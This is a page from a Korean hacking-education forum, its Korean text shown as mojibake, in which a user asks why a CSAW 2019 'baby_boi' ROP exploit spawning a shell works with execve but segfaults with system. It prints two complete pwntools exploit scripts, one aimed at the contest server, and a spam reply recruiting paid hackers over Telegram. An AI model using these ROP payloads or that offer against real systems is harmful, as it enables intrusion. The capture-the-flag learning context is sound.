½Ã½ºÅÛ ÇØÅ·

 1574, 1/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   turttle2s
   system("/bin/sh") ¿Í execve("/bin/sh",0,0)

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1978 [º¹»ç]


À̹ø CSAW 2019¿¡¼­ baby_boi ¹®Á¦¸¦ Ǫ´Âµ¥ Àú´Â system("/bin/sh")À¸·Î ½©À» ½ÇÇà½ÃÅ°·Á°í Çϴµ¥ °è¼Ó ¼¼±×¸ÕÆ® ÆúÆ® ¿À·ù°¡ ¶¹½À´Ï´Ù. core ÆÄÀÏ µð¹ö±ë Çغôµ¥ ¶óÀ̺귯¸® ¾È¿¡¼­ °è¼Ó Á¢±ÙÇÒ ¼ö ¾ø´Â ÁÖ¼Ò¶ó°í ³ª¿À³×¿ä. °á±¹ ¹®Á¦¸¦ Ç®Áö ¸øÇÏ°í ´ëȸ°¡ ³¡³­ ÈÄ Ç®À̸¦ º¸´Âµ¥ ´Ùµé system("/bin/sh")°¡ ¾Æ´Ï¶ó execve("/bin/sh",0,0)À¸·Î ret ÇÏ´õ±º¿ä.

´Ù¸¥ »ç¶÷µéÀÌ »ç¿ëÇÑ Àͽº Äڵ忡¼­ execve()¸¦ system()À¸·Î ¹Ù…f´Âµ¥ ¼¼±×¸ÕÆ® ÆúÆ®°¡ ¶ß°í...(´ç¿¬È÷ ÁÖ¼Òµµ ±¸Çؼ­ ¹Ù²ãÁá½À´Ï´Ù.)
execve()·Î ÇÏ¸é ¼º°øÇÏ°í... Ȥ½Ã ÀÌ µÎ ÇÔ¼öÀÇ Â÷ÀÌ°¡ ÀÖ³ª¿ä?



¾Æ·¡´Â Á¦°¡ »ç¿ëÇÑ Àͽº ÄÚµåÀÔ´Ï´Ù.

======== exp.py ==========
from pwn import *

p = process('./baby_boi')

printf_offset = 0x64e80
system_offset = 0x4f440
pop_rdi = 0x400793

data = p.recv()
data = data.split("\n")[1]
print 'first split = ', data

data = data.split(" ")[3]
print 'second split = ', data

log.info('\t  === GADGET ===')
printf_addr = int(data, 16)
libc_base = printf_addr - printf_offset
system_addr = libc_base + system_offset
binsh_addr = system_addr + 0x164a5a

log.info('libc_base = 0x%08x'%libc_base)
log.info('printf_addr = 0x%08x'%printf_addr)
log.info('system_addr = 0x%08x'%system_addr)
log.info('pop_rdi = 0x%08x'%pop_rdi)

payload = ""
payload += "A"*40
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)

log.info('\t === EXPLOIT START ===')
p.sendline(payload)
p.interactive()
==========================


¾Æ·¡´Â ´Ù¸¥»ç¶÷ÀÇ Ç®ÀÌ ÄÚµåÀÔ´Ï´Ù.
Ãâó : https://github.com/KEERRO/ctf-writeups/tree/master/CSAW%20CTF'19%20QUALS/BABY%20BOI

========= solve.py ===========
from pwn import *
env = {"LD_PRELOAD":"./libc-2.27.so"}
#p = process("./baby_boi",env=env)
p = remote("pwn.chal.csaw.io",1005)

data = p.recv()
data = data.split("\n")[1]
data = data.split(" ")[3]
printf_libc = int(data,16)
base = printf_libc - 0x0000000000064e80
execve = base + 0x00000000000e4e30
binsh = execve + 0xcf06a
print "base: ",hex(base)
print "execve_libc: ",hex(execve)
print "binsh: ",hex(binsh)
pop_rdi = 0x0000000000400793
paylaod = ""
paylaod += "A"*40
paylaod += p64(0x0000000000400791)
paylaod += p64(0)
paylaod += p64(0)
paylaod += p64(pop_rdi)
paylaod += p64(binsh)
paylaod += p64(execve)
p.sendline(paylaod)
p.interactive()
==========================

  Hit : 2329     Date : 2019/09/16 04:56



    
turttle2s ¹ÙÀ̳ʸ®´Â ¾î¶»°Ô ¿Ã¸®³ª¿ä ?_? 2019/09/16  
ss4747 ¾È³çÇϼ¼¿ä!!

¸ðÀÇÇØÅ· °¡´ÉÀÚ ¸ðÁý ÁßÀÎ Çؿܾ÷üÀÔ´Ï´Ù

¾÷¹«ÀÇ ÁøÇà¹æ½ÄÀº ÇÁ¸®·£¼­ Çü½ÄÀ¸·Î ÀúÈñ°¡ Á¦°øÇص帰

»çÀÌÆ® ¸ðÀÇÇØÅ· ¼º°ø½Ã °Ç´ç À¸·Î Áö±ÞÇص帳´Ï´Ù

ÀÚ¼¼ÇѾȳ»»çÇ×¹× ±âŸ¹®ÀÇ´Â ÅÚ·¡±×·¥ ss4747 ¿©±â·Î ¿¬¶ôÁÖ½Ã¸é »ó¼¼ÇÏ°Ô ¾Ë·Áµå¸®°Ú½À´Ï´Ù
2019/10/04  
1574   pwnable.kr echo1 Áú¹®2 (½ºÆ÷ ÁÖÀÇ)[2]     turttle2s
10/05 1134
1573   LOB GATE¹®Á¦ Ç®¸é¼­ ±Ã±ÝÇÑÁ¡[3]     hackxx123
08/24 808
1572   libc°ü·Ã - 2[5]     lMaxl04
08/24 800
1571   ASLRÀÌ °É·ÁÀÖÀ»¶§ ret¿¡ ROPÀ¸·Î jmp %espÀ» »ç¿ëÇÑ °æ¿ì.[3]     lMaxl04
06/29 1053
1570   ¸®¸ðÆ® ȯ°æ¿¡¼­ÀÇ ½ºÅà ÁÖ¼Ò È®ÀÎ ¹æ¹ýÀÌ ±Ã±ÝÇÕ´Ï´Ù.[2]     lMaxl04
06/16 860
1569   ÇØÅ· ÇÁ¸®¼­¹ö ¾ø¾îÁ³³ª¿ä?[1]     terfkim
04/15 1620
1568   ½ºÅÿ¡ µ¥ÀÌÅÍ ³ÖÀ» ¶§ SIGSEGV[4]     turttle2s
02/04 1363
1567   pwnable.kr echo1 Áú¹®[2]     turttle2s
06/17 1635
1566   ROP strcpy °ü·Ã Áú¹®ÀÔ´Ï´Ù.[3]     heeyoung0511
06/16 1500
1565   Level2 -> Level3 ¿¡¼­ vi¿Í /usr/bin/EditorÀÇ Â÷ÀÌ[2]     hyemin1826
07/18 1724
1564   Trainer3 ftz.hackerschool.org È£½ºÆ® Á¢¼Ó ºÒ°¡[1]     hyemin1826
07/18 3095
1563   dllÀÎÁ§¼Ç ½ÇÇèÁß Áú¹® µå¸³´Ï´Ù.[1]     kkk477
05/31 1772
1562   ÆÐŶ º¹È£È­¸¦ ¸¶½ºÅÍ ÇÏ·Á¸é ¾î¶² °úÁ¤ÀÌ ÀÖ¾î¾ßÇϳª¿ä?     sa0814
04/01 1616
1561   »ç±â[2]     jas08
03/31 1912
1560   ½Ã½ºÅÛ ÄÝÀÌ °¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ª°ú ºÒ°¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ªÀÌ Á¸ÀçÇϳª¿ä?     ocal
03/30 1660
1559   pwntools »ç¿ë½Ã¿Í ±âº» socket ¸ðµâ ÀÌ¿ë½Ã Â÷ÀÌ?[4]     ocal
01/09 2179
1558   lob level19(nightmare) °ü·ÃÁú¹®[1]     dnjsdnwja
12/18 1671
1557   ftz level2 Áú¹®ÀÖ½À´Ï´Ù[1]     kihyun1998
12/13 1763
1556   ftz level2¹ø Ǫ´Âµ¥¿ä ±ÇÇÑÀÌ...     kihyun1998
12/06 1638
1555   ½Ã½ºÅÛÇØÅ·ÇÒ¶§ [3]     thsrhkdwns
12/05 2107
1 [2][3][4][5][6][7][8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org